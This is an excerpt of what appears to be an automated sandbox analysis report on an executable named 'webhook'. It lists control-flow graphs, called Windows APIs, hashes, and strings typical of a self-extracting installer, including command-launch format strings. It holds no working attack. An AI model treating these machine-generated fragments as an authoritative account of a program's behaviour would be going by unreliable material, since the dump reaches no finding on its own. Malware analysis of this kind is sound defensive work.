194->198 202 7ff650542204-7ff65054220e 196->202 204 7ff65054215f-7ff650542166 198->204 199->186 206 7ff650541f77-7ff650541ff3 GetPrivateProfileIntA GetPrivateProfileStringA 199->206 200->199 207 7ff650542294-7ff65054229f 201->207 208 7ff650542282-7ff650542287 201->208 211 7ff650542210-7ff650542216 202->211 212 7ff650542223-7ff650542234 202->212 204->204 214 7ff650542168-7ff650542187 LocalAlloc 204->214 215 7ff65054206f-7ff65054207e 206->215 216 7ff650541ff5-7ff650542004 206->216 210 7ff6505422a2-7ff6505422ac call 7ff650542a10 207->210 208->207 209 7ff650542289-7ff650542292 208->209 209->201 209->207 226 7ff6505422b1-7ff6505422bb 210->226 211->212 219 7ff650542218-7ff650542221 211->219 212->210 220 7ff650542236-7ff650542239 212->220 214->186 223 7ff650542199-7ff6505421ad call 7ff65054366c 214->223 221 7ff650542080-7ff6505420a0 GetShortPathNameA 215->221 222 7ff6505420a2 215->222 217 7ff650542007-7ff650542011 216->217 224 7ff650542025-7ff65054203b 217->224 225 7ff650542013-7ff650542018 217->225 219->202 219->212 220->210 227 7ff65054223b-7ff650542263 call 7ff6505435a8 * 2 220->227 228 7ff6505420a9-7ff6505420d5 call 7ff65054366c 221->228 222->228 223->226 231 7ff65054203e-7ff650542048 224->231 225->224 230 7ff65054201a-7ff650542023 225->230 226->197 227->210 228->226 230->217 230->224 235 7ff65054205c-7ff65054206a 231->235 236 7ff65054204a-7ff65054204f 231->236 235->226 236->235 239 7ff650542051-7ff65054205a 236->239 239->231 239->235
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                          • String ID: .BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                          • API String ID: 383838535-3544074861
                          • Opcode ID: 2e4a39167a847aef4def7ff9a37549632115461138b4cb5282ed996653afc72e
                          • Instruction ID: 2a14acd2c4301719ebf569a3388f1aa8ab5e6c888ce69478441f125402fd3f0d
                          • Opcode Fuzzy Hash: 2e4a39167a847aef4def7ff9a37549632115461138b4cb5282ed996653afc72e
                          • Instruction Fuzzy Hash: 40F1AD62A08783B5EB218F24E6442F97BA0FB45784F9C4135DA8EA7795DF3DE529C300

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 242 7ff65054521c-7ff65054527c call 7ff650545140 LocalAlloc 245 7ff6505452ae-7ff6505452c2 call 7ff650545140 242->245 246 7ff65054527e-7ff6505452a1 call 7ff6505461e8 call 7ff650546590 242->246 251 7ff6505452fd-7ff650545342 lstrcmpA LocalFree 245->251 252 7ff6505452c4-7ff6505452fb call 7ff6505461e8 LocalFree 245->252 263 7ff6505452a7-7ff6505452a9 246->263 255 7ff65054538f-7ff650545395 251->255 256 7ff650545344-7ff650545346 251->256 252->263 258 7ff65054566c-7ff650545690 call 7ff6505464b0 255->258 259 7ff65054539b-7ff6505453a1 255->259 261 7ff650545348-7ff650545351 256->261 262 7ff650545353 256->262 267 7ff650545692-7ff6505456be call 7ff6505413e0 258->267 259->258 264 7ff6505453a7-7ff6505453c8 GetTempPathA 259->264 261->262 265 7ff650545356-7ff650545366 call 7ff6505441ec 261->265 262->265 263->267 269 7ff6505453ca-7ff6505453d6 call 7ff6505441ec 264->269 270 7ff650545405-7ff650545411 264->270 278 7ff650545667-7ff65054566a 265->278 279 7ff65054536c-7ff65054538a call 7ff6505461e8 265->279 277 7ff6505453db-7ff6505453dd 269->277 276 7ff650545414-7ff650545417 270->276 280 7ff65054541c-7ff650545426 276->280 277->278 281 7ff6505453e3-7ff6505453ed call 7ff65054332c 277->281 278->267 279->263 283 7ff650545439-7ff65054544b 280->283 284 7ff650545428-7ff65054542d 280->284 281->270 296 7ff6505453ef-7ff6505453ff call 7ff6505441ec 281->296 285 7ff650545451-7ff650545467 GetDriveTypeA 283->285 286 7ff650545633-7ff65054565c GetWindowsDirectoryA call 7ff650545b50 283->286 284->283 289 7ff65054542f-7ff650545437 284->289 290 7ff650545469-7ff65054546c 285->290 291 7ff65054546e-7ff650545482 GetFileAttributesA 285->291 286->263 301 7ff650545662 286->301 289->280 289->283 290->291 294 7ff650545488-7ff65054548b 290->294 291->294 295 7ff650545515-7ff650545528 call 7ff650545b50 291->295 298 7ff65054548d-7ff650545497 294->298 299 7ff650545505 294->299 309 7ff65054554c-7ff650545558 call 7ff65054332c 295->309 310 7ff65054552a-7ff650545536 call 7ff65054332c 295->310 296->270 296->278 303 7ff650545509-7ff650545510 298->303 304 7ff650545499-7ff6505454ab 298->304 299->303 301->276 308 7ff65054562a-7ff65054562d 303->308 304->303 307 7ff6505454ad-7ff6505454d9 GetDiskFreeSpaceA 304->307 307->299 313 7ff6505454db-7ff6505454fc MulDiv 307->313 308->285 308->286 318 7ff65054555a-7ff650545569 GetWindowsDirectoryA 309->318 319 7ff65054556e-7ff650545596 call 7ff65054887c GetFileAttributesA 309->319 310->299 317 7ff650545538-7ff65054554a call 7ff650545b50 310->317 313->299 316 7ff6505454fe-7ff650545503 313->316 316->295 316->299 317->299 317->309 318->319 324 7ff650545598-7ff6505455ab CreateDirectoryA 319->324 325 7ff6505455ad 319->325 326 7ff6505455b0-7ff6505455b2 324->326 325->326 327 7ff6505455c5-7ff6505455e6 SetFileAttributesA 326->327 328 7ff6505455b4-7ff6505455c3 326->328 329 7ff6505455e9-7ff6505455f3 327->329 328->308 330 7ff650545607-7ff650545624 call 7ff6505441ec 329->330 331 7ff6505455f5-7ff6505455fb 329->331 330->278 335 7ff650545626 330->335 331->330 332 7ff6505455fd-7ff650545605 331->332 332->329 332->330 335->308
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: Resource$Free$AttributesDirectoryFileFindLoadLocal$Windows$AllocCreateDialogDiskDriveErrorIndirectLastLockMessageParamPathSizeofSpaceStringTempTypelstrcmpmemcpy_s
                          • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                          • API String ID: 3973824516-2740620654
                          • Opcode ID: 0e9c0d44473e389c0dba35f6887952c7f16077fbc144747ce04e5fe7671e664c
                          • Instruction ID: 11f65f71446649d94d2f855af97fc74f4830e9f5840f31d9b1a5e15e0b93e4ce
                          • Opcode Fuzzy Hash: 0e9c0d44473e389c0dba35f6887952c7f16077fbc144747ce04e5fe7671e664c
                          • Instruction Fuzzy Hash: ACD16F32A1C683B6EB108F2096503FA77A1FB85744F984035DA8DA7796DF7DE825CB00

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 336 7ff650545810-7ff6505458b0 call 7ff650548e0d memset * 2 call 7ff650545140 341 7ff6505458b6-7ff6505458f7 CreateEventA SetEvent call 7ff650545140 336->341 342 7ff650545b04 336->342 347 7ff6505458f9-7ff6505458ff 341->347 348 7ff650545926-7ff65054592e 341->348 344 7ff650545b09-7ff650545b18 call 7ff6505461e8 342->344 349 7ff650545b1d 344->349 350 7ff650545901-7ff650545921 call 7ff6505461e8 347->350 352 7ff650545938-7ff650545953 call 7ff650545140 348->352 353 7ff650545930-7ff650545932 348->353 351 7ff650545b1f-7ff650545b46 call 7ff6505413e0 349->351 350->349 362 7ff65054595d-7ff65054597b CreateMutexA 352->362 363 7ff650545955-7ff65054595b 352->363 353->352 356 7ff650545a02-7ff650545a12 call 7ff650546768 353->356 366 7ff650545a14-7ff650545a1e 356->366 367 7ff650545a23-7ff650545a29 356->367 362->356 365 7ff650545981-7ff650545992 GetLastError 362->365 363->350 365->356 370 7ff650545994-7ff6505459a7 365->370 366->344 368 7ff650545a3c-7ff650545a5b FindResourceExA 367->368 369 7ff650545a2b-7ff650545a37 call 7ff6505426b8 367->369 372 7ff650545a5d-7ff650545a6f LoadResource 368->372 373 7ff650545a72-7ff650545a78 368->373 369->349 374 7ff6505459a9-7ff6505459bf call 7ff6505461e8 370->374 375 7ff6505459c1-7ff6505459de call 7ff6505461e8 370->375 372->373 378 7ff650545a86-7ff650545a8c 373->378 379 7ff650545a7a-7ff650545a81 #17 373->379 385 7ff6505459e0-7ff6505459fd CloseHandle 374->385 375->356 375->385 382 7ff650545a96-7ff650545aa0 call 7ff650543df0 378->382 383 7ff650545a8e-7ff650545a91 378->383 379->378 382->349 388 7ff650545aa2-7ff650545ab1 382->388 383->351 385->349 388->383 389 7ff650545ab3-7ff650545abd 388->389 389->383 390 7ff650545abf-7ff650545ac6 389->390 390->383 391 7ff650545ac8-7ff650545acf call 7ff650543118 390->391 391->383 394 7ff650545ad1-7ff650545b02 call 7ff6505464b0 391->394 394->351
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: Resource$FindLoad$CreateEventmemset$CloseErrorFreeHandleLastLockMessageMutexSizeofStringVersionmemcpy_s
                          • String ID: $EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK
                          • API String ID: 3100096412-3293887400
                          • Opcode ID: 16d8403d54d1fdd36c1b43328a74255bed5f48863335dcf266409fc29e1c7d7d
                          • Instruction ID: 249137ccc2847e6344717b9d4ffc3559a866689710d24be716e7bb76b807d863
                          • Opcode Fuzzy Hash: 16d8403d54d1fdd36c1b43328a74255bed5f48863335dcf266409fc29e1c7d7d
                          • Instruction Fuzzy Hash: 86816831A08643B6F7609B21AA413F97A90EF85784F4C5135D9CEE67A6DF7CE524CB00

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 397 7ff650545b50-7ff650545b95 398 7ff650545b97-7ff650545b9a 397->398 399 7ff650545b9f-7ff650545bc8 GetCurrentDirectoryA SetCurrentDirectoryA 397->399 400 7ff650545e9e-7ff650545ecd call 7ff6505413e0 398->400 401 7ff650545bf7-7ff650545c32 GetDiskFreeSpaceA 399->401 402 7ff650545bca-7ff650545bf2 call 7ff6505461e8 call 7ff650546590 399->402 405 7ff650545c38-7ff650545c60 MulDiv 401->405 406 7ff650545e16-7ff650545e6b memset call 7ff650546590 GetLastError FormatMessageA 401->406 422 7ff650545e9c 402->422 405->406 410 7ff650545c66-7ff650545c9c GetVolumeInformationA 405->410 418 7ff650545e70-7ff650545e97 call 7ff6505461e8 SetCurrentDirectoryA 406->418 413 7ff650545cfd-7ff650545d21 SetCurrentDirectoryA 410->413 414 7ff650545c9e-7ff650545cf8 memset call 7ff650546590 GetLastError FormatMessageA 410->414 416 7ff650545d25-7ff650545d2c 413->416 414->418 420 7ff650545d3f-7ff650545d52 416->420 421 7ff650545d2e-7ff650545d33 416->421 418->422 426 7ff650545d56-7ff650545d59 420->426 421->420 425 7ff650545d35-7ff650545d3d 421->425 422->400 425->416 425->420 427 7ff650545d8c-7ff650545d93 426->427 428 7ff650545d5b-7ff650545d64 426->428 430 7ff650545d95-7ff650545d9d 427->430 431 7ff650545dc2-7ff650545dd3 427->431 428->426 429 7ff650545d66 428->429 429->427 433 7ff650545d68-7ff650545d87 call 7ff6505461e8 429->433 430->431 434 7ff650545d9f-7ff650545dc0 430->434 432 7ff650545dd6-7ff650545dde 431->432 435 7ff650545dfa-7ff650545dfd 432->435 436 7ff650545de0-7ff650545de4 432->436 433->422 434->432 439 7ff650545dff-7ff650545e01 435->439 440 7ff650545e03-7ff650545e06 435->440 438 7ff650545de6 436->438 442 7ff650545e08-7ff650545e11 438->442 443 7ff650545de8-7ff650545df5 call 7ff6505428b8 438->443 439->438 440->438 442->400 443->400
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: CurrentDirectory
                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                          • API String ID: 1611563598-305352358
                          • Opcode ID: 4926850c6f80b5d2401089667c5e764d4b6a610568242aaae11311db6a7c54a3
                          • Instruction ID: 02aaff83cfa67b2fc341332a7b963a1b9a08e9e02699fd06e5b3ba4dbea5cdfc
                          • Opcode Fuzzy Hash: 4926850c6f80b5d2401089667c5e764d4b6a610568242aaae11311db6a7c54a3
                          • Instruction Fuzzy Hash: 38A18036A08B43B7E7208F20E5446EA7BA4FB89744F484135DA8D93B55DF7CD529CB00

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                          • String ID: *MEMCAB$CABINET
                          • API String ID: 1305606123-2642027498
                          • Opcode ID: 3b69f308e7aff4aa40f139636aa249b22d78b8fd704426b43be783c743a20795
                          • Instruction ID: 8ebc9e86fcc889506f7d76434fd4e63e6015fc2f2d348ba3ed42a0d14adfe690
                          • Opcode Fuzzy Hash: 3b69f308e7aff4aa40f139636aa249b22d78b8fd704426b43be783c743a20795
                          • Instruction Fuzzy Hash: 67512831A08B43B6EB519B10EA553F97AA0FF89745F889135C98EA3754EF3CE125CB40

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 500 7ff6505446e8-7ff650544710 501 7ff65054473d-7ff650544744 call 7ff650544f18 500->501 502 7ff650544712-7ff650544718 500->502 509 7ff65054483c 501->509 510 7ff65054474a-7ff650544751 call 7ff65054521c 501->510 504 7ff65054471a-7ff650544721 call 7ff6505456c8 502->504 505 7ff650544730 call 7ff650544598 502->505 504->509 515 7ff650544727-7ff65054472e 504->515 512 7ff650544735-7ff650544737 505->512 514 7ff65054483e-7ff65054485e call 7ff6505413e0 509->514 510->509 518 7ff650544757-7ff650544799 GetSystemDirectoryA call 7ff65054887c LoadLibraryA 510->518 512->501 512->509 515->501 515->505 522 7ff65054479b-7ff6505447b4 GetProcAddress 518->522 523 7ff6505447cf-7ff6505447e4 FreeLibrary 518->523 522->523 524 7ff6505447b6-7ff6505447c9 DecryptFileA 522->524 525 7ff650544879-7ff65054488e SetCurrentDirectoryA 523->525 526 7ff6505447ea-7ff6505447f0 523->526 524->523 527 7ff650544897-7ff65054489d 525->527 528 7ff650544890-7ff650544895 525->528 526->525 529 7ff6505447f6-7ff650544811 GetWindowsDirectoryA 526->529 531 7ff650544917-7ff65054491f 527->531 532 7ff65054489f-7ff6505448a6 527->532 530 7ff650544818-7ff650544836 call 7ff6505461e8 call 7ff650546590 528->530 533 7ff650544860-7ff650544870 call 7ff650545b50 529->533 534 7ff650544813 529->534 530->509 536 7ff65054494b 531->536 537 7ff650544921-7ff650544923 531->537 538 7ff6505448ab-7ff6505448b9 532->538 542 7ff650544875-7ff650544877 533->542 534->530 541 7ff65054494d-7ff65054495b 536->541 537->536 543 7ff650544925-7ff650544931 call 7ff6505434d8 537->543 538->538 544 7ff6505448bb-7ff6505448c2 538->544 548 7ff650544978-7ff65054497f 541->548 549 7ff65054495d-7ff650544963 541->549 542->509 542->525 543->541 545 7ff6505448c4-7ff6505448cb 544->545 546 7ff650544933 call 7ff650544be0 544->546 545->546 551 7ff6505448cd-7ff6505448fb call 7ff6505464b0 545->551 561 7ff650544938-7ff65054493a 546->561 554 7ff65054498a-7ff65054498f 548->554 555 7ff650544981-7ff650544983 548->555 549->548 553 7ff650544965 call 7ff65054721c 549->553 562 7ff6505448fd-7ff65054490b call 7ff650547bb8 551->562 563 7ff65054493c-7ff650544946 551->563 565 7ff65054496a-7ff65054496c 553->565 554->514 555->554 560 7ff650544985 call 7ff650544e34 555->560 560->554 561->562 561->563 562->509 570 7ff650544911 562->570 563->509 565->509 568 7ff650544972 565->568 568->548 570->531
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: DirectoryLibrary$AddressAllocDecryptFileFreeLoadLocalProcSystemWindows
                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                          • API String ID: 3010855178-1173327654
                          • Opcode ID: 9e27674a5b51a4a5e159182f73ecc04bd5b4a3d1429c667e6920d42d51a7d13c
                          • Instruction ID: 3b39ab4a5c7cb1a281a0addccb0c10d8207ebd2bb8930e416a5726fe07e8831b
                          • Opcode Fuzzy Hash: 9e27674a5b51a4a5e159182f73ecc04bd5b4a3d1429c667e6920d42d51a7d13c
                          • Instruction Fuzzy Hash: 91711A21E4CA83B6FA629B21EB413FA3694EF95744F4C4035D9CDE2391EF6CE465CA00

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00007FF650545140: FindResourceExA.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF650545168
                            • Part of subcall function 00007FF650545140: SizeofResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF650545179
                            • Part of subcall function 00007FF650545140: FindResourceA.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF65054519F
                            • Part of subcall function 00007FF650545140: LoadResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF6505451B0
                            • Part of subcall function 00007FF650545140: LockResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF6505451BF
                            • Part of subcall function 00007FF650545140: memcpy_s.MSVCRT ref: 00007FF6505451DE
                            • Part of subcall function 00007FF650545140: FreeResource.KERNEL32(?,?,0000000A,00007FF6505458A6), ref: 00007FF6505451ED
                          • FindResourceA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF650544938), ref: 00007FF650544C10
                          • LoadResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF650544938), ref: 00007FF650544C21
                          • LockResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF650544938), ref: 00007FF650544C30
                          • GetDlgItem.USER32 ref: 00007FF650544C5D
                          • ShowWindow.USER32(?,?,?,?,?,?,?,?,00000000,00007FF650544938), ref: 00007FF650544C6E
                          • GetDlgItem.USER32 ref: 00007FF650544C86
                          • ShowWindow.USER32(?,?,?,?,?,?,?,?,00000000,00007FF650544938), ref: 00007FF650544C9A
                          • FreeResource.KERNEL32 ref: 00007FF650544DB1
                          • SendMessageA.USER32 ref: 00007FF650544E13
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                          • String ID: CABINET
                          • API String ID: 1305606123-1940454314
                          • Opcode ID: 8e442914da32c2caf3f36bfd7032b2ad0c86f0f2f3ea85e4199e9b1ccdfcff45
                          • Instruction ID: 89ce1697dea60ef18126ed10b5371db1c1ae2fcde716da8d796069385b515d4d
                          • Opcode Fuzzy Hash: 8e442914da32c2caf3f36bfd7032b2ad0c86f0f2f3ea85e4199e9b1ccdfcff45
                          • Instruction Fuzzy Hash: 38416D31E08A43B6FB559B20EA553F56AA0FF89745F4C8139CD8EA7791DF3DE0648A00

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 598 7ff6505441ec-7ff650544218 599 7ff6505442e7-7ff6505442f6 598->599 600 7ff65054421e-7ff650544223 call 7ff650544fd8 598->600 602 7ff6505442f9-7ff650544303 599->602 603 7ff650544228-7ff65054422a 600->603 604 7ff650544318-7ff650544323 602->604 605 7ff650544305-7ff65054430b 602->605 606 7ff65054439c 603->606 607 7ff650544230-7ff650544246 603->607 609 7ff650544326-7ff650544330 call 7ff650545ed8 604->609 605->604 608 7ff65054430d-7ff650544316 605->608 611 7ff65054439e-7ff6505443c2 call 7ff6505413e0 606->611 610 7ff650544249-7ff650544253 607->610 608->602 608->604 621 7ff650544351-7ff650544359 call 7ff650545b50 609->621 622 7ff650544332-7ff650544345 CreateDirectoryA 609->622 613 7ff650544268-7ff65054427d 610->613 614 7ff650544255-7ff65054425b 610->614 618 7ff65054427f-7ff650544297 GetSystemInfo 613->618 619 7ff6505442d4-7ff6505442e5 call 7ff65054887c 613->619 614->613 617 7ff65054425d-7ff650544266 614->617 617->610 617->613 625 7ff650544299-7ff65054429c 618->625 626 7ff6505442c3 618->626 619->609 630 7ff65054435e-7ff650544360 621->630 627 7ff650544347 622->627 628 7ff650544370-7ff65054437b call 7ff650546590 622->628 633 7ff6505442ba-7ff6505442c1 625->633 634 7ff65054429e-7ff6505442a1 625->634 629 7ff6505442ca-7ff6505442cf call 7ff65054887c 626->629 627->621 628->606 629->619 636 7ff65054437d-7ff650544384 630->636 637 7ff650544362-7ff65054436e 630->637 633->629 639 7ff6505442b1-7ff6505442b8 634->639 640 7ff6505442a3-7ff6505442a6 634->640 636->606 641 7ff650544386-7ff650544397 RemoveDirectoryA 636->641 637->611 639->629 640->619 642 7ff6505442a8-7ff6505442af 640->642 641->606 642->629
                          APIs
                          • CreateDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF65054807B), ref: 00007FF650544337
                            • Part of subcall function 00007FF650544FD8: RemoveDirectoryA.KERNELBASE(0000000A,00007FF65054807B), ref: 00007FF650545074
                            • Part of subcall function 00007FF650544FD8: GetFileAttributesA.KERNELBASE ref: 00007FF650545083
                            • Part of subcall function 00007FF650544FD8: GetTempFileNameA.KERNEL32 ref: 00007FF6505450B0
                            • Part of subcall function 00007FF650544FD8: DeleteFileA.KERNEL32 ref: 00007FF6505450C8
                            • Part of subcall function 00007FF650544FD8: CreateDirectoryA.KERNEL32 ref: 00007FF6505450D9
                          • GetSystemInfo.KERNEL32(?,?,?,?,?,?,0000000A,00007FF65054807B), ref: 00007FF650544284
                          • RemoveDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF65054807B), ref: 00007FF650544390
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                          • API String ID: 1979080616-3374052426
                          • Opcode ID: b3051c44cdf2447e8502c622c0c4218f7f53285f7723d54c605f1a77c6be6c0c
                          • Instruction ID: 3629caad99a1855eead12735ac1dcf53e8425612aa4a5c48ee4ee1a41b981f6f
                          • Opcode Fuzzy Hash: b3051c44cdf2447e8502c622c0c4218f7f53285f7723d54c605f1a77c6be6c0c
                          • Instruction Fuzzy Hash: B0517B65A4C683B2FA568F15AA043F967A0AF85B44F9C4135DDCDA3791EF7CE424CB00

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: Handle$AddressCloseExitModuleProcVersionWindows
                          • String ID: @$HeapSetInformation$Kernel32.dll
                          • API String ID: 1302179841-1204263913
                          • Opcode ID: 83a8c1ea104aff54c4d7c9c4dbf1586e791a1727480c60f852360176ee8197a3
                          • Instruction ID: 63768d80170d94b8771831b43e269f02e09108ffb3dd61eb60062a23929a1dd3
                          • Opcode Fuzzy Hash: 83a8c1ea104aff54c4d7c9c4dbf1586e791a1727480c60f852360176ee8197a3
                          • Instruction Fuzzy Hash: 4031A331E18643F6FB609B50A6492F976A0EF49B84F4C8435DA8EE3395CF7CE469C600
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true
                          • Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd
                          Similarity
                          • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                          • String ID:
                          • API String ID: 836429354-0
